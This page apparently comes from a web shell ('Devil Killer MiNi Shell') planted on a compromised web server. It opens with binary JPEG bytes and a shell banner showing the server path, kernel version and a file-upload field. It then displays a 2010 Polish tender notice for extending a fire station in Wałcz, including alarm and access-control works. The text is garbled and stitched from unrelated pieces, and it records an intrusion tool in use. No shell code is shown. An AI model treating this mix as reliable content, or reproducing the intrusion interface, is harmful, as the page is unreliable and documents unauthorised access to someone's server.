JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100514/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100514/131816-N-2010.html

<p class="kh_header"><b>Wałcz: Rozbudowa strażnicy Komendy Powiatowej Państwowej Straży Pożarnej i Jednostki Ratowniczo-Gaśniczej w Wałczu przy ul. 12 Lutego 20 - etap IV</b><br>
<b>Numer ogłoszenia: 131816 - 2010; data zamieszczenia: 14.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Komenda Powiatowa Państwowej Straży Pożarnej w Wałczu , ul. 12 Lutego 20, 78-600 Wałcz, woj. zachodniopomorskie, tel. 067 2589471, faks 067 2589471.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbudowa strażnicy Komendy Powiatowej Państwowej Straży Pożarnej i Jednostki Ratowniczo-Gaśniczej w Wałczu przy ul. 12 Lutego 20 - etap IV.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest Rozbudowa strażnicy Komendy Powiatowej Państwowej Straży Pożarnej i Jednostki Ratowniczo-Gaśniczej w Wałczu przy ul. 12 Lutego 20 - etap IV (CPV- 45216120-1 Roboty budowlane w zakresie budowy obiektów budowlanych dla służb ratunkowych,  45216121-8 Obiekty Straży Pożarnej) obejmujące:

1/Budowę budynku garażowo-warsztatowego, parterowego, niepodpiwniczonego oznaczonego symbolem B w niżej określonym zakresie zamykającym całość robót budowlanych.
a/Wykonać tynki i okładziny wewnętrzne z uwzględnieniem następującego uszczegółowienia: 
­Posadzki wykonać w kolorze ceglastym z oznaczeniem pasów stanowiskowych w kolorze żółtym z płytek klinkierowych (ceramicznych) grubości 25mm układanych na mokro metodą wibracyjną we wszystkich pomieszczeniach  budynku B z wyłączeniem pomieszczenia WC; 
­Posadzki i ściany w pomieszczeniu WC wykonać zgodnie z projektem;
­Ściany w pomieszczeniach, z wyłączeniem pomieszczenia WC i pomieszczeń magazynowych nr 1 i 2,  wykończyć glazurą o wymiarach 0,30m x 0,60m do wysokości 2,40m w kolorystyce analogicznej jak w garażach budynku A. Ściany powyżej ułożonej glazury oraz pomieszczeniach magazynowych nr 1 i 2 wykończyć na tynku farbą emulsyjną białą;  
­Ściany w pomieszczeniu myjni oznaczonym nr 10 wykończyć glazurą o wymiarach 0,30m x 0,60m do pełnej wysokości ścian wynoszącej średnio 4,70m, w kolorystyce analogicznej jak w garażach budynku A. 
­Elementy stwarzające możliwość uderzenia lub potknięcia się wykonać z glazury w kolorystyce żółto czarnej przemiennie pasami szerokości 10 cm pod kątem 45 stopni.
b/Wbudować stolarkę otworową - drzwi, bramy i okna wykonać zgodnie z dokumentacją projektową z następującym uszczegółowieniem:
­Bramy garażowe w budynku B wykonać z prześwietleniem dwóch środkowych segmentów konstrukcyjnych z uwzględnieniem pozostałej konstrukcji analogicznie jak wykonana w garażu czterostanowiskowym budynku A wraz z kolorystyką RAL 7032.
c/Elewacje budynku B wykonać zgodnie z dokumentacją projektową. 
d/Dach wykonany w etapie III uzupełnić poprzez:
­Wykonanie części czołowej i spodniej okapu dachu oraz obróbki na połączeniu pokrycia dachu i wykończenia czołowego od frontu budynku B wraz z przebudowaniem istniejącej konstrukcji stelażu zgodnie z uszczegółowieniem projektu: Budynek B, Zamienny szczegół elewacji frontowej, Rys. Nr  n1 Szczegóły okapu,
­Wykonanie części spodniej okapu dachu (podbitki boazeryjnej) wraz z częściowym przebudowaniem istniejącej konstrukcji stelażu od tyłu budynku B zgodnie z uszczegółowieniem projektu: Budynek B, Zamienny szczegół elewacji frontowej, Rys. Nr  n2 Szczegóły okapu,
­ z blachy aluminiowo-cynkowej określonej w projekcie gr. 0,8 mm klejonej na płycie OSB3 gr. 22 mm wraz z ociepleniem oraz wykonanie opierzenia części frontowej dachu w systemie określonym w projekcie gr. 0,6 mm. 
e/Kanał naprawczy w pomieszczeniu garażowym oznaczonym nr 4 wykonać zgodnie z dokumentacją projektową. 
f/Kanał technologiczny odwodnienia w pomieszczeniu myjni samochodowej oznaczonym nr 10 wykonać zgodnie z dokumentacją projektową.

2/Wykonanie nawierzchni placów i parkingów z betonowej kostki brukowej w zakresie:
a/Nawierzchni placu manewrowego, parkingów i chodników przed budynkiem A oraz bramą wjazdową na plac wewnętrzny. Stanowiska parkingowe wydzielić kostką koloru czerwonego. Wyregulować wysokość studzienek wodno - kanalizacyjnych i obrobić. W pozostałym zakresie zgodnie z dokumentacją projektową.
b/Nawierzchni wewnętrznego placu manewrowego wraz z przyległymi parkingami i chodnikami na posesji strażnicy za bramą wjazdową. Wyregulować wysokość studzienek wodno - kanalizacyjnych i obrobić. Stanowiska parkingowe i miejsce zmiany służby wydzielić kostką koloru czerwonego. W pozostałym zakresie zgodnie z dokumentacją projektową.
c/Wykonania przy wejściu głównym do budynku A posadzki z płyty granitowej młotkowanej na podbudowie zgodnie z dokumentacją projektową. Wyregulować wysokość studzienki odwodnienia fundamentowego (instalacji drenażowej) na wysokości podbudowy betonowej i obrobić.

3/Zagospodarowanie terenu w zakresie:
a/Budowy osłony śmietnika;
b/Wykonanie ogrodzenia indywidualnego projektowanego między budynkiem A, a budynkiem B wraz z bramą wjazdową i furtką wejściową na wewnętrzny plac manewrowy ze sterowaniem i otwieraniem z uwzględnieniem niżej opisanego uszczegółowienia:
-Wykonać sterowanie otwieraniem i zamykaniem bramy wjazdowej elektryczne na pilota oraz z istniejącego zintegrowanego pulpitu sterującego łącznością radiową i urządzeniami  obiektowymi usytuowanego na powiatowym stanowisku kierowania PSP. 
-Wykonać sterowanie otwieraniem i zamykaniem furtki wejściowej na wewnętrzny plac manewrowy zamkiem mechaniczno-elektrycznym wyposażonym w czytnik kart zbliżeniowych z klawiaturą i kontrolerem przejścia istniejącego systemu ACCO DOOR firmy Satel. Czytnik połączyć przewodem z istniejącym systemem kontroli dostępu w serwerowni budynku A. Urządzenia należy wykonać w systemie zgodnym z posiadanym systemem kontroli dostępu w budynku A pozwalającym na zastosowanie kompleksowe w różnych przejściach kontrolowanego dostępu jednej indywidualnej karty dostępu.  Moduły sterowniczo zabezpieczające bramy i furtki na wewnętrzny plac manewrowy wykonać z uwzględnieniem następujących elementów:
-Z podrozdzielnicy energetycznej z zasilaniem rezerwowanym (awaryjnym) doprowadzić kabel energetyczny YKY5 x 42 o długości około 50 mb do zasilania elektrycznego silnika bramy przesuwnej. Odrębnie prowadzić kabel XZTKMXpw3 x 2 x 0,82 sterujący automatycznym otwieraniem bramy od sterownika IPCom w serwerowi do silnika elektrycznego napędu mechanizmu przesuwu bramy wjazdowej na wewnętrzny plac manewrowy.
-Bramę wjazdową na wewnętrzny plac manewrowy wyposażyć obustronnie w bariery podczerwieni. Automatyka bramy powinna posiadać możliwość sterowania zewnętrznego. 
-Doprowadzić kabel XZTKMXpw3 x 2 x 0,52 sterujący czytnikiem kart zbliżeniowych o długości około 50 mb prowadzony od sterownika ACCO DOOR firmy Satel w serwerowni poprzez kontroler przejścia zainstalowany w garażu nie dalej niż 20m od czytnika przy furtce wejściowej na wewnętrzny plac manewrowy.  Równolegle od zasilacza systemu kontroli dostępu w serwerowi prowadzić do elektrozaczepu furtki wejściowej przy bramie przesuwnej kabel o symbolu OMY2 x 12.
-Wyposażyć bramy w mechanizmy przesuwne i elementy sterownicze.
- Wyposażyć furtki w samozamykacz oraz mechanizmy zabezpieczające i dedykowane urządzenia dostępowe. 

c/ Wykonanie ogrodzenia indywidualnego między budynkiem A, a południową granicą działki przyległą do garaży na sąsiadującej działce nr 4679/7.
d/ Wykonanie z cegły klinkierowej murków wydzielających funkcje poszczególnych powierzchni zagospodarowania terenu.

4/ Wykonanie kompletnej wewnętrznej instalacji wodno-kanalizacyjnej w budynku B według następującego zakresu:
a/ wykonać piony K1 i K2 z wyprowadzeniem ponad dach zakończone wywiewką, 
b/ wykonać podejście pod wyposażenie sanitarne pomieszczeń (umywalki, zlewy, ubikacje);
c/ zamontować umywalki, zlewozmywaki, ubikacje i armaturę wodną;
d/ wykonać kratki odwadniające wzdłuż bram wyjazdowych oraz zamontować pompę odwadniającą  studzienkę technologiczną garażu z kanałem naprawczym z przyłączeniem do kanalizacji technologicznej wykonanej w III etapie inwestycji; 
e/ Wykonać kanał odwodnienia technologicznego wraz z przyłączeniem do instalacji technologicznej wykonanej w III etapie inwestycji; 
f/ wykonać instalację zimnej i ciepłej wody wraz z zamontowaniem podgrzewaczy elektrycznych;

5/Wykonanie kompletnej instalacji na sprężone powietrze w budynku B wraz z jej przyłączeniem do wykonanej instalacji wyprowadzonej w części szczytowej garażu czterostanowiskowego w budynku A;

6/Wykonanie kompletnych instalacji  grzewczych w budynku B wraz z przyłączeniem do wykonanej w budynku A instalacji zasilającej wyprowadzonej do budynku B z  uwzględnieniem następującego uszczegółowienia:
a/Zamawiający dostarczy 6 wymaganych grzejników, 4 grzejnikowe termoregulatory DANFOS i 5 grzejnikowych zaworów odcinających górnych przeznaczonych do zamontowania w pomieszczeniach Nr 1, 2, 4, 5, 7 i pomieszczenia WC w budynku B według zestawienia w podrozdziale XIX pkt.3 SIWZ;
b/Wykonawca zamontuje i doposaży dostarczone przez Zamawiającego grzejniki w 1 grzejnikowy zawór odcinający górny, 6 grzejnikowych zaworów odcinających dolnych i 2 grzejnikowe termoregulatory analogiczne jak istniejące.

7/Wykonanie kompletnej wentylacji mechanicznej oraz kompletnej instalacji odsysania spalin z rur wydechowych garażowanych pojazdów w budynku B;

8/Wykonanie zewnętrznych instalacji wod - kan (CPV- 45330000-9) obejmujących następujące roboty budowlano - instalacyjne:
a/Wykonanie zewnętrznej instalacji kanalizacji deszczowej w odcinkach:
- od D3 do D21 wraz z wykonaniem kompletnych odprowadzeń wody z połaci dachowej budynku B w punktach: Rd6, Rd7, Rd8.
- od D5 do D9 wraz z wykonaniem odwodnienia liniowego przy wyjeździe z placu manewrowego przed budynkiem A na drogę publiczną i pomiędzy budynkami A i B przy punkcie D22;
- od D11 do D15 i od D14 do D24, D25, D26, D27 wraz z wykonaniem odwodnienia liniowego placu w obrębie stanowiska dystrybucji paliw;
- od D10 do D17 wraz z wykonaniem odwodnienia liniowego placu manewrowego;
- od D19 do D4 i od D18 do D4  z wykonaniem odwodnienia zewnętrznego kanału naprawczego; 
- od D14 do Rd5 z przyłączeniem pionów instalacyjnych odprowadzenia wody z połaci dachowej budynku C;
b/ Wykonanie zewnętrznej instalacji kanalizacji sanitarnej od S15 do S19 i  S20;
c/ Wykonanie zewnętrznej sieci instalacji wodnej w odcinkach:
- od W6 do W15 z przyłączeniem do instalacji wewnętrznej w budynku B,
- od W10 do W 12 zakończonej wykonaniem hydrantu podziemnego;
d/ Przeniesienie hydrantu nadziemnego zgodnie z dokumentacją projektową z istniejącego punktu HP do nowej lokalizacji w punkcie HP1.

9/Wykonanie instalacji specjalistycznych wewnętrznych i zewnętrznych (CPV - 45300000-0) w zakresie budynku B z przyłączeniem systemowym w pomieszczeniu serwerowni budynku A do wykonanego zintegrowanego panelu sterującego urządzeniami obiektowymi umieszczonego na pulpicie dyspozytorskim powiatowego stanowiska kierowania PSP.
Zakres wykonania i przyłączenia instalacji specjalistycznych obejmuje:
a/ Moduł sygnalizacji optycznej i akustycznej o zdarzeniach. System alarmowania DWA100 Digitex wykonać w części garażowej budynku B uwzględniając montaż 3 wyświetlaczy jednostronnych dziesięcionumerowych zgodnie z dokumentacją projektową wraz z przyłączeniem do sytemu dyspozytorskiego. Szczegóły lokalizacyjne uzgodnić z Zamawiającym; 
b/ Moduł sterowania urządzeniami w zakresie automatycznego sterowania bramami garażowymi z uwzględnieniem możliwości zintegrowanego sterowania z istniejącego dotykowego panelu dyspozytorskiego na powiatowym stanowisku kierowania PSP;
c/ Moduł telewizji dozorowej. Do systemu zastosować kamerę dualną kolor/ czarno białą o rozdzielczości nie mniejszej niż 520 linii z promiennikiem podczerwieni;
d/ Moduł kontroli dostępu rozbudować o czytnik kart zbliżeniowych z klawiaturą  ACCO DOOR firmy Satel przy drzwiach wejściowych do pomieszczeń garażowych oraz do pomieszczenia myjni samochodowej z kompletem niezbędnego okablowania uwzględniając kontrolery przejścia i zasilanie elektro - zaczepów w drzwiach  kontrolowanego przejścia. Drzwi wejściowe równolegle z elektroniczną systemową kontrolą dostępu wyposażyć równolegle w zamek mechaniczny umożliwiający zamykanie i otwieranie kluczem mechanicznym; Urządzenia przyłączyć do istniejącego systemu w budynku A.
e/ Moduł rozgłoszeniowy zgodnie z projektem z uwzględnieniem dodatkowego zamontowania w pomieszczeniu myjni jednego głośnika tubowego typu zewnętrznego o podwyższonej odporności  na panującą w tym pomieszczeniu wilgotność i rozprowadzenia niezbędnego okablowania.
f/ Moduł sieci komputerowej.
g/ Organizacja ruchu, obejmująca wykonanie sygnalizatora świetlnego dla wyjeżdżających alarmowo pojazdów pożarniczych zlokalizowanego przy wyjeździe z placu manewrowego Komendy  na drogę publiczną. Sygnalizator należy zsynchronizować z pozostałymi wykonanymi w II etapie sygnalizatorami regulującymi ruch uliczny poprzez zintegrowany panel sterujący na pulpicie dyspozytorskim powiatowego stanowiska kierowania PSP. 
Wykonawca zobowiązany jest dokonać kalkulacji wykonania robót i wyszczególnionego wyposażenia uwzględniając również niezbędne akcesoria i przewody połączeniowe w oparciu o  koncepcję własną oraz uzgodnienia z Zamawiającym;


10/Wyposażyć serwerownię w cyfrowy rejestrator rozmów rejestrujący korespondencję łączności radiowej prowadzonej poprzez system IPCom, korespondencję radiowo - telefoniczną w systemie łączności dalekiego zasięgu (SŁDZ), korespondencję łączności radiowej prowadzonej przez radiotelefon rezerwowy oraz rozmowy telefoniczne prowadzone na powiatowym stanowisku kierowania PSP na numerach alarmowych i cywilnych. Rejestrator powinien być wyposażony w 2 karty 4 kanałowe sygnałów analogowych, 5 kart 4 kanałowych sygnałów cyfrowych oraz 1 kartę 4 kanałową sygnałów mieszanych. Oprócz wymienionych powyżej możliwości dokonywania rejestracji rozmów rejestrator powinien posiadać możliwości techniczne dalszej rozbudowy do 32 kanałów. Rejestrator powinien umożliwiać dalszą rozbudowę rejestracji łączności radiowej i telefonicznej (analogowej i cyfrowej). Z istniejącego cyfrowego systemu IPCom integrującego radiotelefony łączności radiowej wyprowadzić sygnały audio w formie analogowej. Wykonawca zobowiązany jest rozbudować system IPCom o 4 linie analogowe umożliwiające podłączenie do interfejsu analogowego 4 liniowego umiejscowionego w rejestratorze.

Parametry rejestratora:
a) Obudowa w  wersji RACK 19;
b) możliwość rozbudowy do 32 kanałów;
c) Posiadać system bezpieczeństwa danych udokumentowany certyfikatem pozwalającym na wykorzystanie zapisanych danych do procesowej i kryminalistycznej analizy zdarzeń;
d) Działanie oparte na systemie operacyjnym Linux;
e) Niezależny dysk do zapisu rozmów, umieszczony w kieszeni w celu zapewnienia  łatwej wymiany w sytuacjach awaryjnych;
f) Dwa dyski twarde działające w systemie równoległym;
g) Rejestrator powinien współpracować z posiadaną centralą telefoniczną SLICAN CCT 1668 EU;
h) Czas zapisu danych na minimum 7500 godzin;
i) Umożliwiać rozbudowę rejestracji rozmów o kanały VoIP;
j) Oprogramowanie do automatycznej archiwizacji nagrań pozwalające na archiwizacje nagrań;
k) Powinien posiadać oprogramowanie nadzorujące stan pracy rejestratora przez siec LAN/WAN odbiór powiadomień o awariach uniemożliwiających rejestrację rozmów, lub odłączeniu linii od rejestratora; 
l) system zarządzany z poziomu specjalizowanego oprogramowania z możliwością co najmniej zdalnego odsłuchu, monitorowania, archiwizacji, przeglądania oraz umożliwiające filtrację po dacie, numerze;
m) brak możliwości wykasowania i jakiejkolwiek modyfikacji plików zawierających treść nagranych korespondencji bez względu na posiadane uprawnienia;
n) automatyczny odbiór i aktualizacja czasu z serwera NTP lub GPS;
o) odsłuchiwanie rozmów na wielu dedykowanych stanowiskach.
Wykonawca zobowiązany jest dokonać kalkulacji wykonania robót i wyszczególnionego wyposażenia uwzględniając również niezbędne akcesoria i przewody połączeniowe w oparciu o  koncepcję własną  oraz uzgodnienia z Zamawiającym.

11/ Wyposażenie pomieszczenia technicznego z urządzeniami łączności radiowej zlokalizowanego w budynku WSM na osiedlu Dolne Miasto 15, 78-600 Wałcz w podcentralę alarmową CA64PP (kompatybilną z istniejącym systemem) oraz podłączyć za pomocą konwertera światłowodowego danych INT-FI z wykorzystaniem istniejącej instalacji światłowodowej. W pomieszczeniu zainstalować dualną czujkę PIR + MW, magnetyczny czujnik na drzwi wejściowe, sygnalizator wewnętrzny dźwiękowy z regulacją siły głosu oraz czujkę dymu. Całość podłączyć do istniejącej w serwerowni budynku A centrali alarmowej INTEGRA-64. 
W celu przyłączenia urządzeń i instalacji do systemu Wykonawca zobowiązany jest dokonać kalkulacji uwzględniając potrzebny rodzaj i długość przewodów oraz urządzenia systemu w oparciu o  koncepcję własną oraz uzgodnienia z Zamawiającym.

12/ W sali konferencyjnej wykonać szafę i ją wyposażyć w urządzenia integrująco - sterownicze stanowiące wyposażenie sali konferencyjnej oraz przygotować wnękę z panelami na umieszczenie standardowej jednostki komputerowej lub laptopa. Sterowaniu z szafy integrująco - sterującej w sali konferencyjnej podlegać będą następujące istniejące urządzenia:
- panel z pilotem zdalnego sterowania mechanizmem o napędzie elektrycznym przysłaniania okien (verticali);
- panel z pilotem zdalnego sterowania natężeniem oświetlenia;
- panel z pilotem zdalnego sterowania mechanizmem elektrycznych opuszczania lub podnoszenia ekranu;
- panel zasilająco sterujący rzutnikiem multimedialnym wraz z pilotem;
- panel sterujący nagłośnieniem;
- panel z gniazdem sieci LAN we wnęce przeznaczonej na umieszczenie standardowej jednostki komputerowej lub laptopa.

13/ Montaż drzwi antywłamaniowych w pomieszczeniu nr 121 na I piętrze budynku A z uwzględnieniem wykończeniowych obróbek tynkarskich i malarskich dostosowanych jakościowo i kolorystycznie do stanu istniejącego.

14/ Montaż drzwi antywłamaniowych do pomieszczenia technicznego z urządzeniami łączności ( Osiedle Dolne Miasto 15/106C ) z uwzględnieniem wbudowania instalacji antywłamaniowej oraz wykonania obróbek tynkarskich i malarskich dostosowanych jakościowo i kolorystycznie do stanu istniejącego.

15/ Roboty instalacyjne elektryczne zewnętrzne i wewnętrzne w zakresie budynku B (CPV-45310000-3):
a/ Wykonanie kompletnej instalacji elektrycznej wewnętrznej z wykonaniem przyłączenia do rozdzielnicy w budynku A;
b/ Wykonanie kompletnej instalacji odgromowej i połączeń wyrównawczych;
c/ Wykonanie kompletnej instalacji ładowania akumulatorów w samochodach.
d/ Przyłączenie znajdującego się na wyposażeniu zamawiającego, agregatu prądotwórczego GBL30 o mocy 30 kVA z pulpitem sterującym AC-02/GC-MO1 , z miejsca lokalizacji w budynku B do rozdzielni rezerwowanej RGrez w budynku A i rozdzielnią zasilającą RZ w budynku A w sposób  umożliwiający automatyczne załączanie agregatu po zaniku zasilania w energię elektryczną z sieci miejskiej.  Wykonawca uwzględni kompletne okablowanie i urządzenia niezbędne do przyłączenia i automatycznego załączania agregatu do linii kablowych 0,4 kV doprowadzonych do budynku B;

2. Realizacja zadania powinna obejmować wszelkie prace i czynności niezbędne do prawidłowego wykonania przedmiotowego zamówienia w zakresie rzeczowym ujętym w opracowaniach:
1/ Specyfikacji Istotnych Warunków Zamówienia (SIWZ),
2/ Dokumentacji projektowej obejmującej projekty budowlano - wykonawcze,
3/ Specyfikacji technicznej wykonania i odbioru robót, stosownie do zakresu rzeczowego zamówienia,
4/ Planu jakości robót,
5/ Informacji dotyczącej bezpieczeństwa i ochrony zdrowia (BIOZ)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.21.61.20-1, 45.21.61.21-8, 45.31.00.00-3, 45.33.00.00-9, 45.34.20.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości 65 000 zł (sześćdziesiąt pięć tysięcy złotych).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca posiada wiedzę i doświadczenie, jeżeli wykaże minimum 3 z wykonywanych robót budowlanych o wartości co najmniej 500 000 złotych każda i przedstawi opinie inwestorów wykonywanych robót ( np. referencje), które potwierdzą, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i są prawidłowo zakończone.
W przypadku oferty wspólnej wyżej wymieniony dokument składa przynajmniej jeden z uczestników konsorcjum.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia - w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę lub podmiot wystawiający zobowiązanie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wskaże personel odpowiedzialny za wykonywanie usług, kontrolę jakości i kierowanie robotami budowlanymi posiadający wykształcenie wyższe oraz odpowiednie uprawnienia do sprawowania samodzielnych funkcji technicznych w budownictwie w zakresie określonym w załączniku nr 3a oraz wykaże osoby, które będą uczestniczyć w wykonywaniu czynności techniczno - budowlanych w zakresie określonym w załączniku 3b, a także dołączy do oferty dokumenty wyszczególnione w zał. 3a i 3b.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
